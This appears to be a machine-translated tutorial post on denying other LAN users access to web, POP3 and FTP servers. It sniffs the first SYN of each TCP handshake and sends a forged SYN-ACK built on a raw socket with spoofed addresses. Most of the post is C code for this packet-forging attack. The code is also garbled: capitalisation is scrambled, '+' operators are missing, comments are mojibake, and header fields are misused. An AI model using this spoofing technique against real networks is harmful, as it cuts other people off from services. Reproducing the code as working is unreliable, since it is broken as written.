Forge IP package, prohibit TCP connection
Have you thought about how to ban others from accessing Web Server, POP3, FTP, etc. in the LAN. So how do you forbidden? Everyone knows that TCP is connected, three handshakes, after which it can be confirmed. Then we should be able to fake a servant's handshake after the first time, so that the TCP connection is unsuccessful and cannot be accessed. The procedure is as follows:
Void Decodeip (BUF, IBUFSIZE) / / Analyzes the IP Packets IP
{
Ipheader * piphdr;
TCPHEADER * PTCPHDR;
Piphdr = (ipheader *) buf;
// Get the starting position of TCP Header
INT iiphlen = SizeOf (piphdr-> h_lenver & 0xf);
PTCPHDR = (TCPHEADER *) (BUF iiphlen);
/ / Judgment is the first handshake IP packet, piphdr-> th_flag = 2 ("-s ----")
IF (ibufsize == 48) && (piphdr-> iprotocol == ipproto_tcp) && (piphdr-> th_flag == 2)
Sendtcp_synack (szdestip, szsourceip, ptcphdr-> destport, ptcphdr-> Srcport, PTCPHDR-> SEQ);
}
void sendTCP_SYNACK (char * szSrcIP, char * szDestIP, unsigned short srcPort, unsigned short destPort, unsigned int iAck) {int iErrorCode; SOCKET s; IP_HEADER ip_header; TCP_HEADER tcp_header; PSD_HEADER psd_header; struct sockaddr_in remote; char * ptr = NULL; / / Create Sockets = Socket (AF_INET, SOCK_RAW, IPPROTO_IP); if (Checksockerror (S, "Socket-TCP") RETURN FALSE
BOOL bOpt = TRUE; iErrorCode = setsockopt (s, IPPROTO_IP, IP_HDRINCL, (char *) & bOpt, sizeof (bOpt)); if (CheckSockError (iErrorCode, "setsockopt-TCP")) {closesocket (s); return FALSE;}
/ / --- end - // camouflage connection
Unsigned short itdalsize = 44; unsigned short itcpsize = 24; char * sendbuf = new char [itotalsize];
IP_HEADER.H_LENVER = (4 << 4 | sizeof (ip_header) / sizeof (unsigned long); // High four-digit version number, low four first length ip_header.total_len = htons (ipotalsize); // 16-bit total length IP_HEADER.TOS = 0; ip_header.ident = htons (17393); //16?? ±êê??p_header.frag_and_flags=0; //3?? ± ????????offsetip_header.ttl=57; //8?? é'' ?ê ± ?ttlip_header.proto=ipproto_tcp; //8???d-òé (Tcp ,udp?-)ip_header.checksum=0; // 16-bit check and ip_header.sourceip = INET_ADDR (SZSRCIP); // 32 Yuanyuan Address · IP_Header.Destip = INET_ADDR (SZDestip); // 32-bit destination address • IP_HEADER.CHECKSUM = Checksum ((Ushort *) & ip_header, 20);
// fill TCP header tcp_header.th_sport = htons (srcPort); // source port tcp_header.th_dport = htons (destPort); // destination port tcp_header.th_seq = htonl (0x581A784D); // SYN SEQ ID tcp_header.th_ack = htonl (iAck 1); // Answer number TCP_HEADER.TH_LENRES = (Itcpsize / sizeof (unsigned long) << 4 | 0); // TCP length and reserved bit TCP_HEADER.TH_FLAG = 0x12; // syn flag
TCP_HEADER.TH_WIN = HTONS (65535); // Window size TCP_HEADER.TH_URP = 0; // Emergency pointer TCP_HEADER.TH_SUM = 0; // Check and
// Fill the TCP pseudo header (only for generating checks)
PSD_Header.saddr = IP_HEADER.SOURCEIP; PSD_Header.daddr = IP_HEADER.DESTIP; PSD_HEADER.MBZ = 0; psd_header.ptcl = ipproto_tcp; psd_header.tcpl = htons (itcpsize);
ZeroMemory (sendBuf, iTotalSize); // calculate tcp checksum, comprising a pseudo TCP headermemcpy (sendBuf, & psd_header, sizeof (psd_header)); ptr = sendBuf sizeof (psd_header); memcpy (ptr, & tcp_header, sizeof (tcp_header)) PTR = sendbuf sizeof (PSD_HEADER) SIZEOF (TCP_HEADER); * PTR = (char) 0x02; * (PTR 1) = (char) 0x04; * (PTR 2) = (char) 0x05; * (PTR 3) = (char) 0xB4; TCP_HEADER.TH_SUM = Checksum ((USHORT *) Sendbuf, sizeof (psd_header) 24);
ZeromeMory (Sendbuf, ITOTALSIZE);
// Fill the send buffer
memcpy (sendBuf, & ip_header, sizeof (ip_header)); ptr = sendBuf sizeof (ip_header); memcpy (ptr, & tcp_header, sizeof (tcp_header)); ptr = sendBuf sizeof (ip_header) sizeof (tcp_header); * ptr = (char) 0x02; * (PTR 1) = (char) 0x04; * (PTR 2) = (char) 0x05; * (PTR 3) = (char) 0xB4; remote.sin_family = AF_INET; Remote.sin_Port = htons (destPort); remote.sin_addr.s_addr = inet_addr (szDestIP); iErrorCode = sendto (s, sendBuf, iTotalSize, 0, (SOCKADDR *) & remote, sizeof (remote)); CheckSockError (iErrorCode, "SYNACK sendto") ; // disguise closing connection hoodsize = 40; itcpsize = 20; // end -------- CloseSocket (s); delete [] sendbuf; return true;}
